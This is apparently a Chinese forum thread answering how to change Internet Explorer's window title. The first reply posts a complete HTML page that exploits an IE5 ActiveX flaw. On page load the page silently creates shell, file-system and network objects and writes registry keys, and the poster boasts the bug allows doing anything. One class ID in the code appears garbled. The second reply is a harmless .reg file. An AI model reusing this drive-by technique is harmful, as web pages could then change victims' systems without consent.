有个叫什么ieak的软件可以,我找不到了!
改注册表也可以的,我自己改过,但也忘了!我在想……啊!

解决方案 »

  1.   

    你把以下存为 .htm,运行!
    这可是 ie5 的 Bug 啊!利用它,你完全可以为所欲为了!
    IE 6 就不行了!  其它版本没有试过。
    /////////////////////////////////////////////////////////////////////////////////////////<html><head>
    <META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">
    <meta http-equiv="Content-Language" content="zh-cn">
    <title>导航条</title>
    </head>
    <body>
    <SCRIPT>
    //START SET WINDOW TITLE    
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");    
    function f(){    
    try    
    {    
    //ActiveX initialization    
    a1=document.applets[0];    
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");    
    a1.createInstance();    
    Shl = a1.GetObject();    
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228Md");    
    a1.createInstance();    
    FSO = a1.GetObject();    
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");    
    a1.createInstance();    
    Net = a1.GetObject();    
    try    
    {    
    if (document.cookie.indexOf("Chg") == -1)    
    {    
    Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "袁飞站");    
    Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "袁飞站");    
    var expdate = new Date((new Date()).getTime() + (1));    
    document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"    
    }    
    }    
    catch(e)    
    {}    
    }    
    catch(e)    
    {}    
    }    
    function init()    
    {    
    setTimeout("f()", 1000);    
    }    
    init();    
    //END SET WINDOW TITLE    
    </SCRIPT>
    </body>                
    </html>                
                  
      

  2.   

    对了!把下面的文字保存为
    my.reg,然后双击!!REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
    "Window Title" = "我的电脑"